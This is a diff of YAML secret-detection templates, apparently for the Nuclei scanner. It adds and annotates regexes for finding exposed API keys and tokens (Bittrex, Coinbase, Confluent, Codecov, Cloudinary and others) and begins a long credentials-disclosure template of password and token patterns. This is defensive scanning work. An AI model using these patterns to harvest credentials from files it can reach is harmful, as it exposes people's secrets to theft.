b/file/keys/bittrex/bittrex-secret-key.yaml @@ -0,0 +1,23 @@ +id: bittrex-secret-key + +info: + name: Bittrex Secret Key + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bittrex-secret-key.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bittrex-secret-key.go + metadata: + verified: true + tags: bittrex,file,token +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:bittrex)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) + +# digest: 4b0a00483046022100ebad288300a3b81794e829b7c3dad39ffda89ded326bd9238f601448199ebb49022100866ce04aabbf608302418d16d1ce75703e026a3e046b94f94e9dd1e3b9077ef1:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/branch-key.yaml b/file/keys/branch-key.yaml index 877dd31a45..14efab44d2 100644 --- a/file/keys/branch-key.yaml +++ b/file/keys/branch-key.yaml @@ -1,13 +1,17 @@ id: branch-key info: - name: Branch.io Live Key + name: Branch.io Live Key - Detect author: 0xh7ml severity: info + description: Branch.io live key token was detected. reference: - https://github.com/BranchMetrics/android-branch-deep-linking-attribution/issues/74 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 tags: token,file - file: - extensions: - all @@ -16,3 +20,6 @@ file: - type: regex regex: - "key_live_.{32}" + +# Enhanced by md on 2023/05/04 +# digest: 4a0a00473045022100f744edb25f959b276258779576a4f1fb240844fb339af77b5dbb8701453f3257022000c9a3d5ea7358604a0ef75214afb271b0a9932f53f7822a4285e8fcd67a609c:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/clojars-api-token.yaml b/file/keys/clojars-api-token.yaml new file mode 100644 index 0000000000..bbbd9daed7 --- /dev/null +++ b/file/keys/clojars-api-token.yaml @@ -0,0 +1,23 @@ +id: clojars-api-token + +info: + name: Clojars API Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/clojars-api-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/clojars-api-token.go + metadata: + verified: true + tags: clojars,file,token +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(CLOJARS_)[a-z0-9]{60} + +# digest: 490a0046304402204b427e6d5b0b85a2a01767e9477c9f51a650d3aa35b5659fcec845d320fb6e1f022035137915c28e8b67da2b8144515b3348bb78aa33e1dedc4bdd18ea338bf90f6d:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/cloudinary.yaml b/file/keys/cloudinary.yaml index 0823117195..e09cc1e7c5 100644 --- a/file/keys/cloudinary.yaml +++ b/file/keys/cloudinary.yaml @@ -1,11 +1,15 @@ id: cloudinary-basic-auth info: - name: Cloudinary Basic Auth + name: Cloudinary Basic Authorization - Detect author: gaurang severity: high + description: Cloudinary basic authorization token was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-200 tags: token,file,cloudinary - file: - extensions: - all @@ -14,3 +18,6 @@ file: - type: regex regex: - "cloudinary://[0-9]{15}:[0-9A-Za-z\\-_]+@[0-9A-Za-z\\-_]+" + +# Enhanced by md on 2023/05/04 +# digest: 4a0a004730450220252e7780cc4b8371a27c407b24ddf19010972aa12aee03019f95364d69b55c8e022100f1fca5a7e8e7a1543c9b7a8788d4b740437f879d1d478fab3e6722c29b6dd242:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/code-climate-token.yaml b/file/keys/code-climate-token.yaml index fc6927a21b..ef9a00670f 100644 --- a/file/keys/code-climate-token.yaml +++ b/file/keys/code-climate-token.yaml @@ -1,16 +1,20 @@ id: code-climate-token info: - name: Code Climate Token + name: Code Climate Token - Detect author: DhiyaneshDK severity: info + description: Code Climate token was detected. reference: - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/codeclimate.yml - https://github.com/codeclimate/ruby-test-reporter/issues/34 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: verified: true tags: codeclimate,token,file - file: - extensions: - all @@ -19,4 +23,7 @@ file: - type: regex part: body regex: - - '(?i)codeclima.{0,50}\b([a-f0-9]{64})\b' \ No newline at end of file + - '(?i)codeclima.{0,50}\b([a-f0-9]{64})\b' + +# Enhanced by md on 2023/05/04 +# digest: 490a0046304402207a635bcda050998673508eed67a6904113d5c4f53806c012840a48efa75c7aa402206da29de1cec316d7dde7ad0230d8ec023f80c50124120e96e44b1a3b91980aae:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/codecov-access-token.yaml b/file/keys/codecov-access-token.yaml new file mode 100644 index 0000000000..b84a3a26a6 --- /dev/null +++ b/file/keys/codecov-access-token.yaml @@ -0,0 +1,23 @@ +id: codecov-access-token + +info: + name: Codecov Access Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/codecov-access-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/codecov-access-token.go + metadata: + verified: true + tags: codecov,file,token +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:codecov)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) + +# digest: 4a0a0047304502205b6474a1d095e7ff69f48efef9185fe1643db0d86a145eb59faf6efbeddaf812022100bc41351f1182144ebc843b22bc0e6991c66beef1f44121e3ac9782267417eab6:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/coinbase-access-token.yaml b/file/keys/coinbase-access-token.yaml new file mode 100644 index 0000000000..f23a608dac --- /dev/null +++ b/file/keys/coinbase-access-token.yaml @@ -0,0 +1,23 @@ +id: coinbase-access-token + +info: + name: Coinbase Access Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/coinbase-access-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/coinbase-access-token.go + metadata: + verified: true + tags: coinbase,file,token +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:coinbase)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9_-]{64})(?:['|\"|\n|\r|\s|\x60|;]|$) + +# digest: 4a0a00473045022100de04c81768dc774c1439447e53863babe95b4b4da9b560e9a928ca1270d1ca4d02204ef63d2d69bdee98abc12524af4df155394e248d5c438f81bdf0233a4ae08820:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/confluent/confluent-access-token.yaml b/file/keys/confluent/confluent-access-token.yaml new file mode 100644 index 0000000000..cd0867686f --- /dev/null +++ b/file/keys/confluent/confluent-access-token.yaml @@ -0,0 +1,23 @@ +id: confluent-access-token + +info: + name: Confluent Access Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/confluent-access-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/confluent-access-token.go + metadata: + verified: true + tags: confluent,file,token +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:confluent)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{16})(?:['|\"|\n|\r|\s|\x60|;]|$) + +# digest: 490a0046304402204842d991c39eecda77a96ba0a6063d18df92203f992cb18dc17835886787fd4e0220701a4b876eb4a3a74571e7bb840da9180e53f0dae10f1df68c2aecde452b1c5b:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/confluent/confluent-secret-token.yaml b/file/keys/confluent/confluent-secret-token.yaml new file mode 100644 index 0000000000..e4662527c8 --- /dev/null +++ b/file/keys/confluent/confluent-secret-token.yaml @@ -0,0 +1,23 @@ +id: confluent-secret-token + +info: + name: Confluent Secret Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/confluent-secret-key.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/confluent-secret-key.go + metadata: + verified: true + tags: confluent,file,token +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:confluent)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{64})(?:['|\"|\n|\r|\s|\x60|;]|$) + +# digest: 490a0046304402200346db34dcaaddf6a1767cc7c4d1bfa0a91465f8755da46711eae64be5aece7202207b8215d4202c7d6bba81bbb31d8f5d49dc1e4156f378096d547bea734224c7c2:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/contentful-api-token.yaml b/file/keys/contentful-api-token.yaml new file mode 100644 index 0000000000..ab3facb00f --- /dev/null +++ b/file/keys/contentful-api-token.yaml @@ -0,0 +1,23 @@ +id: contentful-api-token + +info: + name: Contentful Delivery API Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/contentful-delivery-api-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/contentful-delivery-api-token.go + metadata: + verified: true + tags: contentful,file,token +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:contentful)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9=_\-]{43})(?:['|\"|\n|\r|\s|\x60|;]|$) + +# digest: 490a0046304402207a47ea4e357cec3090ba8ab850efbc851f1be13b1535a65fcf70957aa49fe05d022055f2088b5908bb20e4b7d95e514a87f83d01c4862a27a05b8b67a3d828ab4ca6:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/cratesio-api-key.yaml b/file/keys/cratesio-api-key.yaml index 9c6766633b..9134c3fb19 100644 --- a/file/keys/cratesio-api-key.yaml +++ b/file/keys/cratesio-api-key.yaml @@ -1,17 +1,21 @@ id: cratesio-api-key info: - name: Crates.io API Key + name: Crates.io API Key - Detect author: DhiyaneshDK severity: info + description: Crates.io API key was detected. reference: - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/crates.io.yml - https://crates.io/data-access - https://github.com/rust-lang/crates.io/blob/master/src/util/token.rs + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: verified: true tags: crates,token,file - file: - extensions: - all @@ -20,4 +24,7 @@ file: - type: regex part: body regex: - - '\bcio[a-zA-Z0-9]{32}\b' \ No newline at end of file + - '\bcio[a-zA-Z0-9]{32}\b' + +# Enhanced by md on 2023/05/04 +# digest: 490a0046304402205a12306264a3aa2e6259a2a87c207d5e30a50342eda282d8db519530f7fa5ac102204b3c62a67e2ae7683642928f7f493fcc9472c9bfe305addf51fc53a95bf2763e:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/credential-exposure-file.yaml b/file/keys/credential-exposure-file.yaml new file mode 100644 index 0000000000..25e80b108c --- /dev/null +++ b/file/keys/credential-exposure-file.yaml @@ -0,0 +1,3468 @@ +id: credentials-disclosure-file + +info: + name: Credentials Disclosure Check + author: Sy3Omda,geeknik,forgedhallpass,ayadi + severity: unknown + description: Check for multiple keys/tokens/passwords hidden inside of files. + tags: exposure,token,file,disclosure +# Extract secrets regex like api keys, password, token, etc ... for different services. +# Always validate the leaked key/tokens/passwords to make sure it's valid, a token/keys without any impact is not an valid issue. +# Severity is not fixed in this case, it varies from none to critical depending upon impact of disclosed key/tokes. +# Regex count:- 687 +# Notes:- +# This template requires manual inspection once found valid match. +# Generic token could be anything matching below regex. +# Impact of leaked token depends on validation of leaked token. +# The regexes are copied from exposures/tokens/generic/credentials-disclosure.yaml +# TODO After https://github.com/projectdiscovery/nuclei/issues/1510 is implemented, we should be able to re-use them, instead of duplicating +# Example cases to match against: https://regex101.com/r/HPtaU2/1 +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - "(?i)[\"']?zopim[_-]?account[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?zhuliang[_-]?gh[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?zensonatypepassword[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)zendesk(_api_token|_key|_token|-travis-github|_url|_username)(\\s|=)" + - "(?i)[\"']?yt[_-]?server[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?yt[_-]?partner[_-]?refresh[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?yt[_-]?partner[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?yt[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?yt[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?yt[_-]?account[_-]?refresh[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?yt[_-]?account[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?yangshun[_-]?gh[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?yangshun[_-]?gh[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?www[_-]?googleapis[_-]?com[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?wpt[_-]?ssh[_-]?private[_-]?key[_-]?base64[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?wpt[_-]?ssh[_-]?connect[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?wpt[_-]?report[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?wpt[_-]?prepare[_-]?dir[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?wpt[_-]?db[_-]?user[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?wpt[_-]?db[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?wporg[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?wpjm[_-]?phpunit[_-]?google[_-]?geocode[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?wordpress[_-]?db[_-]?user[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?wordpress[_-]?db[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?wincert[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?widget[_-]?test[_-]?server[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?widget[_-]?fb[_-]?password[_-]?3[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?widget[_-]?fb[_-]?password[_-]?2[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?widget[_-]?fb[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?widget[_-]?basic[_-]?password[_-]?5[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?widget[_-]?basic[_-]?password[_-]?4[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?widget[_-]?basic[_-]?password[_-]?3[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?widget[_-]?basic[_-]?password[_-]?2[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?widget[_-]?basic[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?watson[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?watson[_-]?device[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?watson[_-]?conversation[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?wakatime[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?vscetoken[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?visual[_-]?recognition[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?virustotal[_-]?apikey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?vip[_-]?github[_-]?deploy[_-]?key[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?vip[_-]?github[_-]?deploy[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?vip[_-]?github[_-]?build[_-]?repo[_-]?deploy[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?v[_-]?sfdc[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?v[_-]?sfdc[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?usertravis[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?user[_-]?assets[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?user[_-]?assets[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?use[_-]?ssh[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?us[_-]?east[_-]?1[_-]?elb[_-]?amazonaws[_-]?com[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?urban[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?urban[_-]?master[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?urban[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?unity[_-]?serial[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?unity[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?twitteroauthaccesstoken[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?twitteroauthaccesssecret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?twitter[_-]?consumer[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?twitter[_-]?consumer[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?twine[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?twilio[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?twilio[_-]?sid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?twilio[_-]?configuration[_-]?sid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?twilio[_-]?chat[_-]?account[_-]?api[_-]?service[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?twilio[_-]?api[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?twilio[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?trex[_-]?okta[_-]?client[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?trex[_-]?client[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?travis[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?travis[_-]?secure[_-]?env[_-]?vars[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?travis[_-]?pull[_-]?request[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?travis[_-]?gh[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?travis[_-]?e2e[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?travis[_-]?com[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?travis[_-]?branch[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?travis[_-]?api[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?travis[_-]?access[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?token[_-]?core[_-]?java[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?thera[_-]?oss[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?tester[_-]?keys[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?test[_-]?test[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?test[_-]?github[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?tesco[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?svn[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?surge[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?surge[_-]?login[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?stripe[_-]?public[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?stripe[_-]?private[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?strip[_-]?secret[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?strip[_-]?publishable[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?stormpath[_-]?api[_-]?key[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?stormpath[_-]?api[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?starship[_-]?auth[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?starship[_-]?account[_-]?sid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?star[_-]?test[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?star[_-]?test[_-]?location[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?star[_-]?test[_-]?bucket[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?star[_-]?test[_-]?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?staging[_-]?base[_-]?url[_-]?runscope[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ssmtp[_-]?config[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sshpass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?srcclr[_-]?api[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?square[_-]?reader[_-]?sdk[_-]?repository[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sqssecretkey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sqsaccesskey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?spring[_-]?mail[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?spotify[_-]?api[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - 